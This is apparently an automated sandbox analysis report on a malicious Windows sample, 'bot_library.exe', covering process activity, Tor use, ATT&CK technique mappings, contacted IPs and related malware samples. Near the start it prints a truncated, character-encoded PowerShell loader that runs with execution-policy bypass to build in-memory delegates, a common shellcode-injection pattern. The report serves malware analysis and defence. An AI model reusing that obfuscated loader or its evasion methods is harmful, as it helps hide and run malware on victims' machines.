Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -noprofile -executionpolicy bypass -command " function get-delegate { param([type[]]$eomkxlvbu2qeag, [type]$virftba9lf) $c4cimftfcck = [appdomain]::currentdomain.definedynamicassembly( (new-object reflection.assemblyname([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [reflection.emit.assemblybuilderaccess]::run).definedynamicmodule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $false).definetype( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [multicastdelegate]) $c4cimftfcck.defineconstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [reflection.callingconventions]::standard, $eomkxlvbu2qeag).setimplementationflags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4cimftfcck.definemethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $virftba9lf, $eomkxlvbu2qeag).setimplementationflags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -noprofile -executionpolicy bypass -command " function get-delegate { param([type[]]$eomkxlvbu2qeag, [type]$virftba9lf) $c4cimftfcck = [appdomain]::currentdomain.definedynamicassembly( (new-object reflection.assemblyname([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [reflection.emit.assemblybuilderaccess]::run).definedynamicmodule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $false).definetype( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [multicastdelegate]) $c4cimftfcck.defineconstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [reflection.callingconventions]::standard, $eomkxlvbu2qeag).setimplementationflags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4cimftfcck.definemethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $virftba9lf, $eomkxlvbu2qeag).setimplementationflags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha			Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Windows\System32\iRAjHsIkbP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Windows\System32\iRAjHsIkbP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor\pluggable_transports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor\pluggable_transports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor\pluggable_transports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor\pluggable_transports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Queries volume information: C:\Tor\tor VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Tor\tor\tor.exe	Queries volume information: C:\Tor\torrc VolumeInformation	Jump to behavior
Source: C:\Tor\tor\tor.exe	Queries volume information: C:\Tor\torrc VolumeInformation	Jump to behavior
Source: C:\Tor\tor\tor.exe	Queries volume information: C:\Users\user\AppData\Roaming\tor VolumeInformation	Jump to behavior
Source: C:\Tor\tor\tor.exe	Queries volume information: C:\Users\user\AppData\Roaming\tor\state VolumeInformation	Jump to behavior
Source: C:\Tor\tor\tor.exe	Queries volume information: C:\Users\user\AppData\Roaming\tor\state VolumeInformation	Jump to behavior
Source: C:\Tor\tor\tor.exe	Queries volume information: C:\Users\user\AppData\Roaming\tor\state VolumeInformation	Jump to behavior
Source: C:\Tor\tor\tor.exe	Queries volume information: C:\Users\user\AppData\Roaming\tor\state VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe

Code function: 0_2_00007FF7FF8FA0D8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7FF8FA0D8

Source: C:\Users\user\Desktop\bot_library.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	411 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner
C:\Tor\tor\pluggable_transports\conjure-client.exe	0%	ReversingLabs
C:\Tor\tor\pluggable_transports\lyrebird.exe	0%	ReversingLabs
C:\Tor\tor\pluggable_transports\snowflake-client.exe	0%	ReversingLabs
C:\Tor\tor\tor-gencert.exe	0%	ReversingLabs
C:\Tor\tor\tor.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://contoso.com/License	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://bugs.torproject.org/tpo/core/tor/21155.	0%	Avira URL Cloud	safe
https://www.torproject.org/	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
http://nuget.org/NuGet.exe	0%	Avira URL Cloud	safe
https://docs.rs/getrandom#nodejs-es-module-support	0%	Avira URL Cloud	safe
https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	Avira URL Cloud	safe
https://bugs.torproject.org/tpo/core/tor/14917.	0%	Avira URL Cloud	safe
https://www.gnu.org/licenses/gpl-3.0.en.html)	0%	Avira URL Cloud	safe
https://blog.torproject.org/v2-deprecation-timeline	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	0%	Avira URL Cloud	safe
https://sabotage.net	0%	Avira URL Cloud	safe
https://www.torproject.org/documentation.html	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://bridges.torproject.org/status?id=%s	0%	Avira URL Cloud	safe
https://support.torproject.org/faq/staying-anonymous/	0%	Avira URL Cloud	safe
https://contoso.com/	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Avira URL Cloud	safe
https://bridges.torproject.org/status?id=%suninitialized	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://blog.torproject.org/lifecycle-of-a-new-relay	0%	Avira URL Cloud	safe
https://support.torproject.org/faq/staying-anonymous/alphabetaThis	0%	Avira URL Cloud	safe
https://aka.ms/pscore68	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://blog.torproject.org/lifecycle-of-a-new-relayset	0%	Avira URL Cloud	safe
https://freehaven.net/anonbib/#hs-attack06	0%	Avira URL Cloud	safe
https://github.com/Pester/PesterXz	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
https://www.torproject.org/docs/faq.html#BestOSForRelay	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngXz	0%	Avira URL Cloud	safe
https://bugs.torproject.org/tpo/core/tor/8742.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
archive-01.torproject.org	159.69.63.226	true	false		unknown
archive.torproject.org	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.99384583822.000002BB355E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.99387448650.000002BB3D68A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.99387448650.000002BB3D68A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000003.00000002.99370438729.000002BB26624000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.rs/getrandom#nodejs-es-module-support	bot_library.exe, 00000000.00000003.99400379023.00000246AFD40000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99965602166.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, bot_library.exe, 00000000.00000000.99352983968.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.99402171669.0000000000400000.00000020.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugs.torproject.org/tpo/core/tor/21155.	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://www.torproject.org/	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://bugs.torproject.org/tpo/core/tor/14917.	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://bridges.torproject.org/status?id=%s	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.99387448650.000002BB3D68A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.torproject.org/faq/staying-anonymous/	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://www.gnu.org/licenses/gpl-3.0.en.html)	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://blog.torproject.org/v2-deprecation-timeline	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	true	Avira URL Cloud: safe	unknown
https://sabotage.net	tor.exe, 00000005.00000003.99614692438.0000028359488000.00000004.00000020.00020000.00000000.sdmp, tor.exe, 00000005.00000003.99601698116.000002835997C000.00000004.00000020.00020000.00000000.sdmp, tor.exe, 00000005.00000003.99595951014.00000283596D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.torproject.org/documentation.html	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.99384583822.000002BB355E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridges.torproject.org/status?id=%suninitialized	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	bot_library.exe, 00000000.00000003.99962904781.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99961894361.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99962440340.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99964350976.00000246AFC40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99387728702.000002BB3D6C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/PesterXz	powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://freehaven.net/anonbib/#hs-attack06	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://blog.torproject.org/lifecycle-of-a-new-relay	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://blog.torproject.org/lifecycle-of-a-new-relayset	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.99370438729.000002BB25571000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	bot_library.exe, 00000000.00000003.99962904781.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99961894361.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99962440340.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99964350976.00000246AFC40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99387728702.000002BB3D6C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.torproject.org/faq/staying-anonymous/alphabetaThis	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.99370438729.000002BB25571000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugs.torproject.org/tpo/core/tor/8742.	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://www.torproject.org/docs/faq.html#BestOSForRelay	tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.pngXz	powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.69.67.17	unknown	Germany	49855	PLUTEXHermann-Ritter-Str108DE	false
159.69.63.226	archive-01.torproject.org	Germany	24940	HETZNER-ASDE	false
45.138.16.240	unknown	Netherlands	62068	SPECTRAIPSpectraIPBVNL	false
23.111.179.34	unknown	United States	29802	HVC-ASUS	false
45.148.121.112	unknown	Netherlands	64425	SKB-ENTERPRISENL	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1510303
Start date and time:	2024-09-12 19:56:01 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bot_library.exe
Detection:	MAL
Classification:	mal92.evad.winEXE@8/34@1/6
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Execution Graph export aborted for target bot_library.exe, PID 6340 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6208 because it is empty
Execution Graph export aborted for target tor.exe, PID 8584 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: bot_library.exe

Simulations

Behavior and APIs

Time	Type	Description
13:58:09	API Interceptor	4x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.69.67.17	2X3f1ykTmM.exe	Get hash	malicious	Kronos	Browse	109.69.67.17/tor/server/fp/5c01b2d72d75f109550963f810c2010bda208549
159.69.63.226	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	17dDkWbjoz.exe	Get hash	malicious	PureLog Stealer	Browse
	SecuriteInfo.com.Win32.Malware-gen.6320.5781.exe	Get hash	malicious	Xmrig	Browse
45.138.16.240	b.png.ps1	Get hash	malicious	AsyncRAT, PhoenixRAT	Browse
23.111.179.34	c8sDO7umrx.exe	Get hash	malicious	CMSBrute	Browse
45.148.121.112	bot_library.exe	Get hash	malicious	Unknown	Browse
	i3LQkjkqOB.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	grjD7lWffX.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	7VzdKNO227.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
archive-01.torproject.org	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	17dDkWbjoz.exe	Get hash	malicious	PureLog Stealer	Browse	159.69.63.226
	SecuriteInfo.com.Win32.Malware-gen.6320.5781.exe	Get hash	malicious	Xmrig	Browse	159.69.63.226

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PLUTEXHermann-Ritter-Str108DE	2X3f1ykTmM.exe	Get hash	malicious	Kronos	Browse	109.69.67.17
SPECTRAIPSpectraIPBVNL	_%e0%b8%b0%e0%b8%99%e0%b8%b2%e0%b8%b3%e0%b8%b7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.234
	R.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.197
	1RGKUwuqi0.exe	Get hash	malicious	Remcos, PureLog Stealer, XRed	Browse	45.138.16.248
	KbUI.exe	Get hash	malicious	Remcos, PureLog Stealer, XRed	Browse	45.138.16.248
	arm5.elf	Get hash	malicious	Unknown	Browse	185.224.128.74
